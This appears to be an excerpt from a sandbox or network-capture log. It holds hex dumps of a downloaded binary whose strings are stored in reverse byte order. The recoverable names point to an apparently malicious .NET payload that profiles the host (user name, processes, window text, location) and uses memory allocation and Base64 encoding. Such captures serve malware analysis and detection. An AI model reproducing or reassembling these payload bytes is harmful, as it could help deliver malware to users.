                                                  2022-04-23 06:14:45 UTC380INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:14:45 UTC382INData Raw: 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 02 e4 00 00 00 00 00 00 00 00 00 00 02 e4 00 06 00 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: ?OFNI_NOISREV_SV4XH0
                                                  2022-04-23 06:14:45 UTC383INData Raw: 00 08 18 02 18 03 07 05 ed 81 11 35 12 01 02 00 08 05 1d 02 05 1d 02 18 08 06 07 0a 18 05 1d 02 07 05 0e 0e 02 07 04 a9 80 12 00 20 05 18 00 20 03 a1 80 12 00 00 05 02 02 02 02 e9 80 12 a5 80 12 75 12 02 08 07 0f 7d 12 0e 05 1d 02 20 07 0e 1d 0e 01 00 05 89 80 11 00 20 05 89 80 11 00 00 05 69 81 11 01 01 00 06 89 80 11 02 7d 12 71 81 12 02 05 07 0c 9c 80 12 01 07 05 08 08 0e 02 20 05 03 08 01 20 04 0e 0e 08 0e 08 0e 94 80 12 07 07 0b 1c 0e 0e 02 00 05 0d 00 20 03 49 82 11 00 20 05 bd 80 12 00 00 05 49 82 11 08 08 bd 80 12 04 07 0a 21 81 11 08 25 81 11 11 81 11 1d 81 11 0e 01 06 20 11 08 08 05 1d 0e 03 20 07 0e 01 01 00 04 02 0e 02 03 07 05 05 1d 0e 01 02 00 06 d5 80 11 0e 01 00 06 0e 01 81 12 01 00 06 98 80 11 0e 0e 0e 04 07 08 05 1d 08 39 81 12 03 07 08
                                                  Data Ascii: 5 u} i}q I I!% 9
                                                  2022-04-23 06:14:45 UTC384INData Raw: 36 31 08 72 65 64 6c 69 75 42 65 63 72 75 6f 73 65 52 64 65 70 79 54 79 6c 67 6e 6f 72 74 53 2e 73 6c 6f 6f 54 2e 73 65 63 72 75 6f 73 65 52 2e 6d 65 74 73 79 53 33 00 01 41 00 00 00 00 00 15 00 01 08 00 00 00 00 00 14 00 01 08 00 00 00 00 00 13 00 01 08 0e 1d 00 28 04 00 00 00 00 00 12 00 01 08 00 00 00 00 00 11 00 01 08 24 11 00 28 04 00 00 00 00 00 10 00 01 08 00 00 00 00 00 0f 00 01 08 00 00 00 00 00 0e 00 01 08 b8 80 12 00 28 05 00 00 00 00 00 0d 00 01 08 00 00 00 00 00 0c 00 01 08 00 00 00 00 00 0b 00 01 08 00 00 00 00 00 0a 00 01 08 00 00 00 00 00 09 00 01 08 00 00 00 00 00 08 00 01 08 00 00 00 00 00 07 00 01 08 0c 81 12 00 28 05 00 00 00 00 00 06 00 01 08 60 12 00 28 04 08 00 28 03 ac 80 11 00 28 05 4c 11 00 28 04 d5 81 11 01 01 20 06 00 00 00 00
                                                  Data Ascii: 61redliuBecruoseRdepyTylgnortS.slooT.secruoseR.metsyS3A($(((`(((L(
                                                  2022-04-23 06:14:45 UTC386INData Raw: 12 18 01 20 06 1c 39 12 18 e5 80 12 03 20 09 18 18 01 20 04 02 10 18 02 02 00 06 02 0e 0e 02 03 00 06 09 10 09 19 18 02 04 00 08 0e 10 18 18 02 00 06 22 01 0e 10 18 01 00 05 09 10 09 18 18 02 04 00 08 08 2d 82 12 18 18 09 04 00 09 18 02 01 00 04 02 01 18 02 78 11 18 03 00 07 08 01 08 2a 02 09 10 09 18 1d 02 03 00 08 2d 82 12 18 09 18 18 04 00 09 08 2d 82 12 18 08 03 00 08 c5 80 11 10 08 0a 02 00 08 08 70 12 08 02 03 00 07 08 10 08 08 02 00 06 08 2d 82 12 08 01 03 00 08 08 08 08 18 18 04 00 07 08 08 2d 82 12 08 08 08 05 00 0a 08 00 00 03 6c 11 08 01 00 05 68 12 06 03 05 1d 01 01 20 05 05 1d 00 20 04 0e 00 20 03 02 01 01 20 04 05 1d 06 03 e5 80 12 02 01 20 06 1c 39 12 08 e5 80 12 03 20 09 08 02 01 20 04 18 1c 01 02 20 05 08 08 02 02 20 05 5c 12 25 82 12 25
                                                  Data Ascii: 9 "-x*--p--lh 9 \%%
                                                  2022-04-23 06:14:45 UTC387INData Raw: 54 00 77 6f 4e 5f 74 65 67 00 65 6d 61 4e 72 65 73 55 5f 74 65 67 00 6c 6f 63 6f 74 6f 72 50 79 74 69 72 75 63 65 53 5f 74 65 73 00 66 4f 78 65 64 6e 49 00 6e 69 4d 00 74 61 6d 72 6f 46 00 73 64 6e 6f 63 65 53 6c 61 74 6f 54 5f 74 65 67 00 64 65 73 70 61 6c 45 5f 74 65 67 00 77 65 4e 74 72 61 74 53 00 65 6d 61 4e 79 72 6f 74 63 65 72 69 44 74 65 47 00 65 74 65 6c 65 44 00 73 65 74 79 42 6c 6c 41 65 74 69 72 57 00 68 74 61 50 72 65 64 6c 6f 46 74 65 47 00 79 72 6f 74 63 65 72 69 44 65 74 61 65 72 43 00 68 74 61 50 70 6d 65 54 74 65 47 00 64 6e 65 70 70 41 00 67 6e 69 72 74 73 62 75 53 00 68 74 69 57 73 74 72 61 74 53 00 6d 69 72 54 00 6d 6f 72 46 64 61 6f 4c 00 67 6e 69 72 74 53 34 36 65 73 61 42 6f 54 00 74 6e 61 69 72 61 76 6e 49 72 65 70 70 55 6f 54 00
                                                  Data Ascii: TwoN_tegemaNresU_teglocotorPytiruceS_tesfOxednIniMtamroFsdnoceSlatoT_tegdespalE_tegweNtratSemaNyrotceriDteGeteleDsetyBllAetirWhtaPredloFteGyrotceriDetaerChtaPpmeTteGdneppAgnirtsbuShtiWstratSmirTmorFdaoLgnirtS46esaBoTtnairavnIreppUoT
                                                  2022-04-23 06:14:45 UTC388INData Raw: 64 6f 4d 74 65 47 00 73 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 6d 75 6e 45 00 78 45 65 6d 61 4e 65 6c 69 46 65 6c 75 64 6f 4d 74 65 47 00 65 6c 64 6e 61 48 65 73 6f 6c 43 00 73 73 65 63 6f 72 50 6e 65 70 4f 00 73 65 73 73 65 63 6f 72 50 6d 75 6e 45 00 65 67 61 73 73 65 4d 64 6e 65 53 00 74 78 65 54 77 6f 64 6e 69 57 74 65 47 00 74 63 65 52 77 6f 64 6e 69 57 74 65 47 00 73 77 6f 64 6e 69 57 64 6c 69 68 43 6d 75 6e 45 00 64 49 73 73 65 63 6f 72 50 64 61 65 72 68 54 77 6f 64 6e 69 57 74 65 47 00 65 6d 61 4e 73 73 61 6c 43 74 65 47 00 63 6f 6c 6c 41 6c 61 75 74 72 69 56 00 6f 66 6e 49 6f 65 47 74 65 47 00 44 49 43 4c 74 6c 75 61 66 65 44 72 65 73 55 74 65 47 00 44 49 6f 65 47 72 65 73 55 74 65 47 00 61 00 6c 6f 64 71 67 6b 4d 00 02 80 80 e2 88 80 e2 8b 80 e2
                                                  Data Ascii: doMteGseludoMssecorPmunExEemaNeliFeludoMteGeldnaHesolCssecorPnepOsessecorPmunEegasseMdneStxeTwodniWteGtceRwodniWteGswodniWdlihCmunEdIssecorPdaerhTwodniWteGemaNssalCteGcollAlautriVofnIoeGteGDICLtluafeDresUteGDIoeGresUteGalodqgkM
                                                  2022-04-23 06:14:45 UTC390INData Raw: 74 6e 75 52 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 6b 72 6f 77 65 6d 61 72 46 74 65 67 72 61 54 00 65 74 75 62 69 72 74 74 41 72 65 74 6e 69 6f 50 6e 6f 69 74 63 6e 75 46 64 65 67 61 6e 61 6d 6e 55 00 74 6e 65 6d 6e 6f 72 69 76 6e 45 65 6d 69 74 6e 75 52 00 6c 61 68 73 72 61 4d 00 65 74 75 62 69 72 74 74 41 65 6c 62 69 73 69 56 6d 6f 43 00 73 65 63 69 76 72 65 53 70 6f 72 65 74 6e 49 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 6e 6f 69 74 6e 65 76 6e 6f 43 67 6e 69 6c 6c 61 43 00 73 72 65 70 6c 65 48 65 6d 69 74 6e 75 52 00 65 74 75 62 69 72 74 74 41 79 74 69 6c 69 62 69 74 61 70 6d 6f 43 65 6d 69 74 6e 75 52 00 65 6c 69 74 61 6c 6f 56 73 49 00 73 65 63 69 76 72 65 53 72 65 6c 69 70 6d 6f 43 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00
                                                  Data Ascii: tnuR.metsySetubirttAkrowemarFtegraTetubirttAretnioPnoitcnuFdeganamnUtnemnorivnEemitnuRlahsraMetubirttAelbisiVmoCsecivreSporetnI.emitnuR.metsySnoitnevnoCgnillaCsrepleHemitnuRetubirttAytilibitapmoCemitnuRelitaloVsIsecivreSrelipmoC.emitnuR.metsyS
                                                  2022-04-23 06:14:45 UTC391INData Raw: 53 73 73 65 63 6f 72 50 00 6e 6f 69 74 63 65 6c 6c 6f 43 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 73 73 65 63 6f 72 50 00 65 74 75 62 69 72 74 74 41 65 64 6f 43 72 65 73 55 6e 6f 4e 72 65 67 67 75 62 65 44 00 65 74 75 62 69 72 74 74 41 6e 65 64 64 69 48 72 65 67 67 75 62 65 44 00 65 74 61 74 53 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 73 63 69 74 73 6f 6e 67 61 69 44 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 65 74 61 67 65 6c 65 44 00 65 6d 69 54 65 74 61 44 00 74 72 65 76 6e 6f 43 00 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 2e 6d 65 74 73 79 53 00 6e 6f 69 74 70 65 63 78 45 32 33 6e 69 57 00 64 65 7a 69 6c 61 69 63 65 70 53 2e 73 6e 6f
                                                  Data Ascii: SssecorPnoitcelloCeludoMssecorPeludoMssecorPssecorPetubirttAedoCresUnoNreggubeDetubirttAneddiHreggubeDetatSelbasworBreggubeDscitsongaiD.metsySetubirttAelbasworBreggubeDetageleDemiTetaDtrevnoCledoMtnenopmoC.metsySnoitpecxE23niWdezilaicepS.sno
                                                  2022-04-23 06:14:45 UTC392INData Raw: 32 00 2f 00 31 00 2f 00 30 00 24 00 27 00 24 00 26 00 24 00 25 00 20 00 24 00 20 00 23 00 20 00 22 00 20 00 21 00 19 00 1f 00 19 00 1e 00 19 00 1d 00 19 00 1c 00 19 00 1b 00 19 00 1a 00 16 00 17 00 15 00 16 00 0e 00 0f 00 04 00 07 00 04 00 06 00 04 00 05 00 02 00 03 00 00 00 eb 00 00 00 02 00 05 08 04 00 00 00 ca 00 00 00 02 00 00 00 00 00 00 00 00 00 67 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 5b 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 49 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 3c 00 13 00 00 00 00 00 00 00 00 00 04 00 02 00 00 00 00 00 35 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 26 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 1d 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00
                                                  Data Ascii: 2/1/0$'$&$% $ # " !g[I<5&
                                                  2022-04-23 06:14:45 UTC394INData Raw: 08 40 08 39 08 2b 08 27 08 22 08 1e 00 1f 00 00 00 00 00 01 00 1d 00 00 00 00 00 01 00 07 00 00 00 63 00 01 00 06 00 00 00 0d 00 01 00 05 00 00 00 0c 00 01 02 10 00 c5 02 10 00 c1 01 e6 00 bf 01 e6 00 b7 01 e6 00 af 01 f0 00 a5 01 f0 00 a1 01 e6 00 9d 01 e3 00 99 05 fe 00 64 05 ee 00 1b 14 41 05 ee 00 1b 14 21 05 ee 00 1b 12 81 05 ee 00 1b 12 61 05 ee 00 1b 12 41 05 ee 00 1b 12 21 05 ee 00 1b 12 01 05 ee 00 1b 11 e1 05 ee 00 1b 11 c1 05 ee 00 1b 11 a1 05 ee 00 1b 11 81 05 ee 00 1b 11 61 05 ee 00 1b 11 41 05 ee 00 1b 11 21 05 ee 00 1b 11 01 05 ee 00 1b 10 e1 05 ee 00 1b 10 c1 05 ee 00 1b 10 a1 05 ee 00 1b 10 81 05 ee 00 1b 10 61 05 ee 00 1b 10 41 05 ee 00 1b 10 21 05 ee 00 1b 10 01 00 5c 00 23 0f c0 00 5c 00 23 0f a0 05 ee 00 1b 0f 81 00 5c 00 23 0f 80 05
                                                  Data Ascii: @9+'"cdA!aA!aA!aA!\#\#\#
                                                  2022-04-23 06:14:45 UTC395INData Raw: 54 08 cf 11 98 00 54 04 5a 15 44 04 29 0d ad 12 50 02 81 08 45 15 38 04 41 0d a7 0d 88 04 29 01 76 12 50 04 59 0d a0 13 bc 04 59 09 3c 15 25 03 01 08 87 10 8c 00 54 00 28 0d 88 00 54 00 70 0c 20 00 09 0c f4 15 20 03 b9 00 23 0d 88 01 01 01 8f 15 0e 03 b9 0a 5c 11 8c 02 91 0c e5 14 fe 03 a1 02 e1 14 ec 02 69 00 28 0d 88 02 f9 0c c5 14 dc 01 49 09 42 14 d3 04 29 01 76 14 cb 04 29 01 76 14 bc 01 49 02 c8 0e 0d 00 f1 0c c9 14 b0 01 41 0c c5 14 a5 01 41 0c bf 14 93 01 41 0c a7 14 86 02 e1 0c a1 11 6b 04 29 01 76 10 83 02 59 01 76 12 50 01 11 0c 9b 14 76 01 11 0c 95 14 6e 01 11 02 e1 14 61 01 a1 07 a5 10 b0 00 f9 00 28 0d 88 00 f9 00 28 0d 88 02 e1 0c 8e 14 4c 02 d9 0c 75 13 b2 04 29 0c 70 14 44 04 29 04 a2 14 40 02 c1 00 a8 0d 88 04 99 0c 5e 14 39 04 29 0c 5a
                                                  Data Ascii: TTZD)PE8A)vPYY<%T(Tp #\i(IB)v)vIAAAk)vYvPvna((Lu)pD)@^9)Z
                                                  2022-04-23 06:14:45 UTC396INData Raw: 00 0a 00 03 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00
                                                  Data Ascii: pln)' ln)' ' n)' ' ' )' pln)'
                                                  2022-04-23 06:14:45 UTC398INData Raw: 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c a1 00 0c 00 00 0c c9 00 0b 00 00 0c 77 00 0a 00 00 0c 49 00 09 00 00 0c 22 00 08 00 00 0c 9a 00 07 00 00
                                                  Data Ascii: n)' ' ' n)' ' ' ' pln)' ln)' ' )' wI"
                                                  2022-04-23 06:14:45 UTC399INData Raw: 00 00 01 c9 00 1c 0e 32 00 91 00 00 00 00 85 00 01 c9 00 1c 0e 2a 00 96 00 00 00 00 83 74 01 c8 05 e7 0c 20 00 91 00 00 00 00 83 58 01 c8 04 64 0c 20 00 93 00 00 00 00 83 50 01 c7 05 e0 0c 20 00 91 00 00 00 00 83 34 01 c7 05 da 0c 20 00 93 00 00 00 00 83 2c 01 c6 05 ce 0c 20 00 93 00 00 00 00 82 dc 01 c5 05 c7 0c 20 00 93 00 00 00 00 82 90 01 c5 00 1c 0c 20 00 93 00 00 00 00 82 10 01 c5 00 1c 0c 20 00 93 00 00 00 00 81 a0 01 c5 00 1c 0c 20 00 93 00 00 00 00 80 c8 01 c5 02 57 0c 20 00 93 00 00 00 00 7f f4 01 c4 02 5b 0c 20 00 93 00 00 00 00 7f 64 01 c4 00 28 0d 88 18 86 00 00 00 00 7f 44 01 c4 05 c2 0c 20 00 93 00 00 00 00 7f 04 01 c3 05 bb 0c 20 00 93 00 00 00 00 7e e8 01 c3 05 b5 0c 20 00 93 00 00 00 00 7e cc 01 c3 05 af 0c 20 00 93 00 00 00 00 7e 70 01
                                                  Data Ascii: 2*t Xd P 4 , W [ d(D ~ ~ ~p
                                                  2022-04-23 06:14:45 UTC400INData Raw: 00 00 00 74 38 01 36 04 b6 0c 20 00 83 00 00 00 00 74 18 01 35 00 a8 0c 29 00 83 00 00 00 00 73 f8 01 35 01 76 0c 29 00 83 00 00 00 00 73 d8 01 34 01 71 0c 20 00 83 00 00 00 00 73 b8 01 34 00 2c 0c 20 00 83 00 00 00 00 73 98 01 33 00 a8 0c 27 00 83 00 00 00 00 73 78 01 33 01 76 0c 27 00 83 00 00 00 00 73 58 01 32 00 a8 0c 20 00 83 00 00 00 00 73 38 01 32 01 76 0c 20 00 83 00 00 00 00 73 18 01 31 00 23 0c 20 00 83 00 00 00 00 72 f8 01 31 00 30 0c 20 00 83 00 00 00 00 72 d8 01 31 00 28 0d 88 18 86 00 00 00 00 72 b8 01 31 00 1c 0c 20 00 93 00 00 00 00 72 3c 01 31 00 1c 0c 20 00 93 00 00 00 00 71 44 01 31 02 57 0c 20 00 93 00 00 00 00 70 4c 01 31 00 1c 0c 20 00 93 00 00 00 00 6e d0 01 31 00 28 0d 9d 05 c6 00 00 00 00 00 00 01 31 00 34 0d 9d 05 c6 00 00 00 00
                                                  Data Ascii: t86 t5)s5v)s4q s4, s3'sx3v'sX2 s82v s1# r10 r1(r1 r<1 qD1W pL1 n1(14
                                                  2022-04-23 06:14:45 UTC402INData Raw: 01 c6 00 03 00 00 00 00 00 df 03 b1 0d d2 01 c6 00 03 00 00 00 00 00 dd 01 51 0d 88 18 86 00 03 00 00 00 00 00 dc 01 66 0d e5 01 c6 00 03 00 00 00 00 00 d8 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 d6 03 44 0d d2 01 c6 00 03 00 00 00 00 00 d4 01 51 0d 88 18 86 00 03 00 00 00 00 00 d2 03 a8 0d e5 01 c6 00 03 00 00 00 00 00 cb 03 98 0d d9 01 c6 00 03 00 00 00 00 00 c6 03 8d 0d d2 01 c6 00 03 00 00 00 00 00 c4 01 51 0d 88 18 86 00 03 00 00 00 00 00 c1 03 80 0d e5 01 c6 00 03 00 00 00 00 00 b5 03 69 0d d9 01 c6 00 03 00 00 00 00 00 ab 03 57 0d d2 01 c6 00 03 00 00 00 00 00 a9 01 51 0d 88 18 86 00 03 00 00 00 00 00 a8 01 66 0d e5 01 c6 00 03 00 00 00 00 00 a4 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 a2 03 44 0d d2 01 c6 00 03 00 00 00 00 00 a0 01 51 0d 88 18 86 00
                                                  Data Ascii: QfKDQQiWQfKDQ
                                                  2022-04-23 06:14:45 UTC403INData Raw: af 0c 20 20 93 00 80 00 00 00 00 00 3b 01 a6 0c 20 20 93 00 80 00 00 00 00 00 37 01 9e 0c 20 20 93 00 80 00 00 00 00 00 32 01 93 0c 20 20 93 00 80 00 00 00 00 00 32 01 8f 0c 20 20 93 00 80 00 00 00 00 00 31 01 89 0c 20 20 93 00 80 00 00 00 00 00 30 01 71 0c 29 00 83 00 00 00 00 3c f4 00 30 00 2c 0c 29 00 83 00 00 00 00 3c d4 00 2f 01 7f 0c 20 00 83 00 00 00 00 3c b4 00 2f 01 7a 0c 20 00 83 00 00 00 00 3c 94 00 2e 00 a8 0c 20 00 83 00 00 00 00 3c 74 00 2e 01 76 0c 20 00 83 00 00 00 00 3c 54 00 2d 01 71 0c 27 00 83 00 00 00 00 3c 34 00 2d 00 2c 0c 27 00 83 00 00 00 00 3c 14 00 2c 01 71 0c 20 00 83 00 00 00 00 3b f4 00 2c 00 2c 0c 20 00 83 00 00 00 00 3b d4 00 2c 00 28 0d 88 18 86 00 00 00 00 3b b4 00 2b 01 66 0d e5 01 c6 00 03 00 00 00 00 00 28 01 5c 0d d9
                                                  Data Ascii: ; 7 2 2 1 0q)<0,)</ </z <. <t.v <T-q'<4-,'<,q ;,, ;,(;+f(\
                                                  2022-04-23 06:14:45 UTC404INData Raw: 0c 6e 00 01 00 9d 0c 29 00 01 00 9d 0c 27 00 01 01 11 0c 20 00 01 02 dc 0c 20 00 11 02 d7 0c 6e 80 56 02 d7 0c 29 80 56 02 d7 0c 27 80 56 02 d7 0c 20 80 56 00 20 0d bb 06 06 00 20 0c 22 00 01 00 9d 0c 9a 00 01 02 b4 0c 70 00 01 00 9d 0c 6c 00 06 00 9d 0c 6e 00 01 00 20 0c 29 00 01 02 af 0c 27 00 01 00 20 0c 20 00 01 02 aa 0c 27 00 01 00 9d 0c 20 00 21 00 9d 0c a1 00 01 00 9d 0c c9 00 06 00 89 0c 77 00 06 00 89 0c 49 00 06 00 89 0c 22 00 06 00 89 0c 9a 00 06 00 89 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 9d 0c 27 00 01 00 9d 0c 20 00 06 00 20 0c 29 00 01 00 20 0c 27 00 01 01 6d 0c 20 00 01 02 73 0c 20 00 33 00 89 0c 9a 00 06 00 9d 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 89 0c 27 00 06 02 69 0c 20 00
                                                  Data Ascii: n)' nV)V'V V "pln )' ' !wI"pln)' ) 'm s 3pln)'i
                                                  2022-04-23 06:14:45 UTC406INData Raw: 79 00 00 0c 9c 00 00 01 80 00 b6 00 6c 01 65 00 00 0c 9a 00 00 01 05 00 b2 00 6c 01 65 00 00 0c 70 00 00 01 05 00 ae 00 6c 01 65 00 00 0c 6e 00 00 01 05 00 aa 00 6c 01 65 00 00 0c 6c 00 00 01 05 00 a6 00 6c 01 65 00 00 0c 77 00 00 01 05 00 a2 00 6c 01 65 00 00 0c 29 00 00 01 05 00 9e 00 6c 01 65 00 00 0c 49 00 00 01 05 00 9a 00 6c 01 65 00 00 0c 27 00 00 01 05 00 96 00 6c 01 65 00 00 0c 22 00 00 01 05 00 92 00 6c 01 65 00 00 0c 20 00 00 01 05 00 91 00 62 01 79 00 00 0c 95 00 10 01 80 00 88 00 5e 00 30 00 00 0c 90 00 10 01 00 00 84 00 5e 01 79 00 00 0c 8b 00 10 01 80 00 82 00 5d 01 79 00 00 0c 86 00 10 01 80 00 82 00 58 00 cd 00 00 0c 81 00 00 01 00 00 81 00 58 01 79 00 00 0c 7c 00 10 01 80 00 80 00 58 01 79 00 00 0c 77 00 10 01 80 00 7f 00 58 00 00 00 00
                                                  Data Ascii: yleleplenlellewle)leIle'le"le by^0^y]yXXy|XywX
                                                  2022-04-23 06:14:45 UTC407INData Raw: 00 06 05 33 05 9e 00 06 05 33 05 94 00 06 05 33 05 86 00 06 05 33 05 7c 00 06 05 4d 05 71 00 0e 05 4d 05 63 00 0e 05 4d 05 3d 00 0e 05 33 05 24 00 06 00 35 05 18 00 06 00 35 05 0b 00 06 04 f6 04 ea 00 06 00 35 04 e7 00 06 00 35 04 dd 00 06 00 00 04 cf 00 d3 00 35 04 c3 00 06 00 35 04 be 00 06 00 26 04 b9 00 0a 00 26 04 af 00 0a 00 35 04 a8 00 06 03 d7 04 9e 00 0e 03 d7 04 93 00 06 03 d7 04 88 00 06 03 d7 04 75 00 0e 03 d7 04 64 00 0e 03 d7 04 4c 00 0e 03 d7 04 3e 00 0e 03 d7 04 36 00 0e 03 d7 04 19 00 06 03 d7 04 01 00 06 03 d7 03 ea 00 06 03 d7 03 bc 00 06 00 35 03 b3 00 06 00 35 03 aa 00 06 00 35 03 a2 00 06 03 8c 03 7d 00 0e 03 5e 03 4a 00 0e 03 14 03 33 00 06 03 14 03 27 00 06 03 14 03 08 00 06 02 b6 03 01 00 06 02 b6 02 ed 00 06 02 b6 02 df 00 06 02
                                                  Data Ascii: 3333|MqMcM=3$555555&&5udL>6555}^J3'
                                                  2022-04-23 06:14:45 UTC409INData Raw: 53 4f 63 20 0c 87 9a ac c5 0f 1d 85 2a 5d 6d a9 93 55 f2 30 c8 15 29 db 13 07 85 2a 5d 71 68 2a 36 07 15 53 7b 6e 85 d8 cc 85 2a 52 80 95 6c db 40 a8 9f 70 fa d5 ad 6d dc 6f 93 0d 79 04 3f b1 4a 74 65 de af 18 13 60 5e af f1 e4 33 ca af 4d 52 bf f0 69 e6 80 ae ac 41 34 7d 85 2a 52 9a 33 d0 90 44 8e 85 2a 52 c1 bd 69 59 14 85 2a 52 ca 48 8f 83 df d2 d1 f9 65 32 85 86 c5 df 4d 59 76 bb 78 93 fb 9e 28 09 36 95 10 05 20 7b 85 2a 52 f6 8b 05 ff d3 c3 5d 33 11 51 59 c3 5c 15 ac b3 50 16 4a ce 01 0d 85 2a 52 17 eb cf e0 30 0e 97 98 c4 ea 98 b7 09 44 cc fb e2 88 3c f4 20 6a c0 1a c5 0a 85 2a 52 34 5a 6b 71 8e a2 dd 19 a2 df f4 7e bf 4c 39 bb 63 42 38 34 88 12 b0 4f e5 1d 21 e8 9f 90 00 b9 4c a6 85 2a 52 59 67 fb 12 2d bd 3b cb e1 85 2a 52 56 b4 fb f2 21 61 aa 59
                                                  Data Ascii: SOc *]mU0)*]qh*6S{n*Rl@pmoy?Jte`^3MRiA4}*R3D*RiY*RHe2MYvx(6 {*R]3QY\PJ*R0D< j*R4Zkq~L9cB84O!L*RYg-;*RV!aY
                                                  2022-04-23 06:14:45 UTC410INData Raw: 72 69 bc c2 85 2a 57 a4 0e a6 4d b8 85 2a 57 c5 7a 63 3d 50 fe 8d 1d 90 49 ef 4c cc 41 ef 3f 85 2a 57 db 6b 8d 97 bd 29 83 f9 51 bb 51 85 2a 57 e2 e7 64 c1 b4 81 22 a4 ab a9 13 49 6e de 00 14 16 1d c2 10 15 c4 0d d3 f0 e0 04 6c e1 ee 5f 02 85 2a 57 14 f4 fb dc c6 90 b9 cd 42 da 58 ec 1b a8 a2 64 a5 15 2f ef f2 0f dc d0 60 2a 1d 80 85 2a 57 3f 57 66 f9 dc ba b7 f8 d6 dd 3e 39 85 2a 57 3e 65 32 50 91 fd 21 14 85 2a 57 45 a4 a9 cb 51 ee bc 61 85 2a 57 48 c9 cf 74 5b 70 c1 98 bf aa 3d 70 1e ef 31 85 2a 57 55 26 99 9a 4a 63 85 2a 57 65 a0 f9 dd ad 1f 0d 84 d0 2c 85 2a 57 72 e4 93 35 fd 4b 16 6a 59 11 b5 1a fd e1 a9 ec e8 b9 c6 11 38 a0 68 92 42 85 2a 54 85 